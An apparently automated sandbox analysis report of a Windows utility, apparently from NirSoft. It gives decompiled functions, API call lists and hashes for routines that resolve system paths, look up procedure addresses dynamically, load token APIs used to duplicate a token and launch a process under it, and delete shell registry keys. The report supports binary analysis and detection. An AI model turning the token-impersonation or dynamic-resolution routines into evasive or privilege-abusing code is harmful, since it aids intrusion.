                                                                                                                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                          • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                          • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                                                                                                                          • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                          			E0040920A(wchar_t* __edi, wchar_t* __esi) {
                                                                                                                                                                                                                          				void _v526;
                                                                                                                                                                                                                          				long _v528;
                                                                                                                                                                                                                          				wchar_t* _t17;
                                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                                          				wchar_t* _t50;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t50 = __edi;
                                                                                                                                                                                                                          				if(__esi[0] != 0x3a) {
                                                                                                                                                                                                                          					_t17 = wcschr( &(__esi[1]), 0x3a);
                                                                                                                                                                                                                          					if(_t17 == 0) {
                                                                                                                                                                                                                          						_t40 = E0040488D(__esi, L"\\systemroot");
                                                                                                                                                                                                                          						if(_t40 < 0) {
                                                                                                                                                                                                                          							if( *__esi != 0x5c) {
                                                                                                                                                                                                                          								wcscpy(__edi, __esi);
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								_v528 = 0;
                                                                                                                                                                                                                          								memset( &_v526, 0, 0x208);
                                                                                                                                                                                                                          								E00404C08( &_v528);
                                                                                                                                                                                                                          								memcpy(__edi,  &_v528, 4);
                                                                                                                                                                                                                          								__edi[1] = __edi[1] & 0x00000000;
                                                                                                                                                                                                                          								wcscat(__edi, __esi);
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_v528 = 0;
                                                                                                                                                                                                                          							memset( &_v526, 0, 0x208);
                                                                                                                                                                                                                          							E00404C08( &_v528);
                                                                                                                                                                                                                          							wcscpy(__edi,  &_v528);
                                                                                                                                                                                                                          							wcscat(__edi, __esi + 0x16 + _t40 * 2);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                                          						return _t50;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_push( &(_t17[0]));
                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                          					wcscpy(_t50, ??);
                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                                                          				goto L4;
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00409223
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00409233
                                                                                                                                                                                                                            • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                                                                                                                            • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                                                                                                                            • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00409282
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040928D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409269
                                                                                                                                                                                                                            • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                                                                                                                            • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004092B1
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004092CC
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 004092D8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                                                          • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                          • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                                                                                                                          • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                                                                                                          			E00409C70(signed int* _a4) {
                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                          				char* _v16;
                                                                                                                                                                                                                          				int _v18;
                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                          				intOrPtr* _t21;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t22;
                                                                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                                                                          				signed int _t24;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                          				char* _t28;
                                                                                                                                                                                                                          				int _t31;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t21 = _a4;
                                                                                                                                                                                                                          				if( *_t21 == 0) {
                                                                                                                                                                                                                          					_t22 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                                                                                          					_v8 = _t22;
                                                                                                                                                                                                                          					_t23 = GetProcAddress(_t22, "GetProcAddress");
                                                                                                                                                                                                                          					 *_a4 = _t23;
                                                                                                                                                                                                                          					_t24 = _t23 ^ _v8;
                                                                                                                                                                                                                          					if((_t24 & 0xfff00000) != 0) {
                                                                                                                                                                                                                          						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
                                                                                                                                                                                                                          						_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                          						_v12 = _t26;
                                                                                                                                                                                                                          						asm("stosd");
                                                                                                                                                                                                                          						asm("stosw");
                                                                                                                                                                                                                          						asm("movsd");
                                                                                                                                                                                                                          						asm("movsd");
                                                                                                                                                                                                                          						asm("movsd");
                                                                                                                                                                                                                          						asm("movsw");
                                                                                                                                                                                                                          						_t28 =  &_v36;
                                                                                                                                                                                                                          						asm("movsb");
                                                                                                                                                                                                                          						_v16 = _t28;
                                                                                                                                                                                                                          						_v20 = strlen(_t28);
                                                                                                                                                                                                                          						_t31 = strlen( &_v36);
                                                                                                                                                                                                                          						_v18 = _t31;
                                                                                                                                                                                                                          						_t24 = _v12(_v8,  &_v20, 0, _a4);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					return _t24;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t21;
                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00409CE4
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00409CF1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcstrlen
                                                                                                                                                                                                                          • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 1027343248-2054640941
                                                                                                                                                                                                                          • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                                                                                                                          • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040289F(intOrPtr* __esi) {
                                                                                                                                                                                                                          				void* _t9;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t10;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t14;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if( *(__esi + 0x10) == 0) {
                                                                                                                                                                                                                          					_t10 = LoadLibraryW(L"advapi32.dll");
                                                                                                                                                                                                                          					 *(__esi + 0x10) = _t10;
                                                                                                                                                                                                                          					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
                                                                                                                                                                                                                          					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
                                                                                                                                                                                                                          					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
                                                                                                                                                                                                                          					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
                                                                                                                                                                                                                          					 *(__esi + 8) = _t14;
                                                                                                                                                                                                                          					return _t14;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t9;
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                          • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                                                                                                                          • API String ID: 2238633743-1970996977
                                                                                                                                                                                                                          • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                                                                                                                          • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 39%
                                                                                                                                                                                                                          			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				void _v2054;
                                                                                                                                                                                                                          				short _v2056;
                                                                                                                                                                                                                          				void _v4102;
                                                                                                                                                                                                                          				short _v4104;
                                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0x1004, __ecx);
                                                                                                                                                                                                                          				_t36 = 0;
                                                                                                                                                                                                                          				if(E004043F8( &_v8, 0x2001f) == 0) {
                                                                                                                                                                                                                          					_v2056 = 0;
                                                                                                                                                                                                                          					memset( &_v2054, 0, 0x7fe);
                                                                                                                                                                                                                          					_v4104 = 0;
                                                                                                                                                                                                                          					memset( &_v4102, 0, 0x7fe);
                                                                                                                                                                                                                          					_t34 = __ebx + 0x20a;
                                                                                                                                                                                                                          					_push(_t34);
                                                                                                                                                                                                                          					_push(__ebx);
                                                                                                                                                                                                                          					_push(L"%s\\shell\\%s\\command");
                                                                                                                                                                                                                          					_push(0x3ff);
                                                                                                                                                                                                                          					_push( &_v2056);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					_push(_t34);
                                                                                                                                                                                                                          					_push(__ebx);
                                                                                                                                                                                                                          					_push(L"%s\\shell\\%s");
                                                                                                                                                                                                                          					_push(0x3ff);
                                                                                                                                                                                                                          					_push( &_v4104);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					RegDeleteKeyW(_v8,  &_v2056);
                                                                                                                                                                                                                          					_t28 = RegDeleteKeyW(_v8,  &_v4104);
                                                                                                                                                                                                                          					asm("sbb esi, esi");
                                                                                                                                                                                                                          					_t36 =  ~_t28 + 1;
                                                                                                                                                                                                                          					RegCloseKey(_v8);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t36;
                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Delete_snwprintfmemset$Close
                                                                                                                                                                                                                          • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                                                                                                                                          • API String ID: 1018939227-3575174989
                                                                                                                                                                                                                          • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                                                                                                                          • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                                                          			E0040313D(void* __ecx) {
                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                          				struct HWND__* _t6;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t11;
                                                                                                                                                                                                                          				struct HWND__* _t15;
                                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v12 = 8;
                                                                                                                                                                                                                          				_v8 = 0xff;
                                                                                                                                                                                                                          				_t15 = 0;
                                                                                                                                                                                                                          				_t20 = 0;
                                                                                                                                                                                                                          				_t23 = LoadLibraryW(L"comctl32.dll");
                                                                                                                                                                                                                          				if(_t23 == 0) {
                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                          					__imp__#17();
                                                                                                                                                                                                                          					_t6 = 1;
                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                          					if(_t6 != 0) {
                                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                                                                                                                                                                          				if(_t11 != 0) {
                                                                                                                                                                                                                          					_t20 = 1;
                                                                                                                                                                                                                          					_t15 =  *_t11( &_v12);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				FreeLibrary(_t23);
                                                                                                                                                                                                                          				if(_t20 == 0) {
                                                                                                                                                                                                                          					goto L5;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t6 = _t15;
                                                                                                                                                                                                                          					goto L6;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                                                                                                                          • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                                                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                                                          • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                                                                                                                          • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                          			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
                                                                                                                                                                                                                          				struct HWND__* _v8;
                                                                                                                                                                                                                          				struct HWND__* _v12;
                                                                                                                                                                                                                          				struct tagRECT _v28;
                                                                                                                                                                                                                          				struct tagRECT _v44;
                                                                                                                                                                                                                          				int _t50;
                                                                                                                                                                                                                          				long _t61;
                                                                                                                                                                                                                          				struct HDC__* _t63;
                                                                                                                                                                                                                          				intOrPtr _t65;
                                                                                                                                                                                                                          				intOrPtr _t68;
                                                                                                                                                                                                                          				struct HWND__* _t71;
                                                                                                                                                                                                                          				intOrPtr _t72;
                                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                                          				int _t74;
                                                                                                                                                                                                                          				int _t80;
                                                                                                                                                                                                                          				int _t83;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t73 = __edx;
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                          				_t74 = GetSystemMetrics(0x11);
                                                                                                                                                                                                                          				_t80 = GetSystemMetrics(0x10);
                                                                                                                                                                                                                          				if(_t74 == 0 || _t80 == 0) {
                                                                                                                                                                                                                          					_t63 = GetDC(0);
                                                                                                                                                                                                                          					_t80 = GetDeviceCaps(_t63, 8);
                                                                                                                                                                                                                          					_t74 = GetDeviceCaps(_t63, 0xa);
                                                                                                                                                                                                                          					ReleaseDC(0, _t63);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				GetWindowRect(_a4,  &_v44);
                                                                                                                                                                                                                          				if((_a8 & 0x00000004) != 0) {
                                                                                                                                                                                                                          					_t71 = GetParent(_a4);
                                                                                                                                                                                                                          					if(_t71 != 0) {
                                                                                                                                                                                                                          						_v28.left = _v28.left & 0x00000000;
                                                                                                                                                                                                                          						asm("stosd");
                                                                                                                                                                                                                          						asm("stosd");
                                                                                                                                                                                                                          						asm("stosd");
                                                                                                                                                                                                                          						GetWindowRect(_t71,  &_v28);
                                                                                                                                                                                                                          						_t61 = _v28.left;
                                                                                                                                                                                                                          						_t72 = _v28.top;
                                                                                                                                                                                                                          						_t80 = _v28.right - _t61 + 1;
                                                                                                                                                                                                                          						_t74 = _v28.bottom - _t72 + 1;
                                                                                                                                                                                                                          						_v8 = _t61;
                                                                                                                                                                                                                          						_v12 = _t72;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t65 = _v44.right;
                                                                                                                                                                                                                          				if((_a8 & 0x00000001) == 0) {
                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                          					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t83 = 0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t68 = _v44.bottom;
                                                                                                                                                                                                                          				if((_a8 & 0x00000002) != 0) {
                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                          					_t50 = 0;
                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                          					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
                                                                                                                                                                                                                          					if(_t50 >= 0) {
                                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                                          						if(_t83 < 0) {
                                                                                                                                                                                                                          							_t83 = 0;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                                                                                                                                          • ReleaseDC.USER32 ref: 00404DF4
                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00404E07
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00404E12
                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00404E2F
                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2163313125-0
                                                                                                                                                                                                                          • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                                                                                                                          • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                                                          			E00406398(void* __eflags, wchar_t* _a4) {
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t3;
                                                                                                                                                                                                                          				int _t6;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t3 = E00404AAA(_a4);
                                                                                                                                                                                                                          				if(_t3 != 0) {
                                                                                                                                                                                                                          					wcscpy(0x40fb90, _a4);
                                                                                                                                                                                                                          					wcscpy(0x40fda0, L"general");
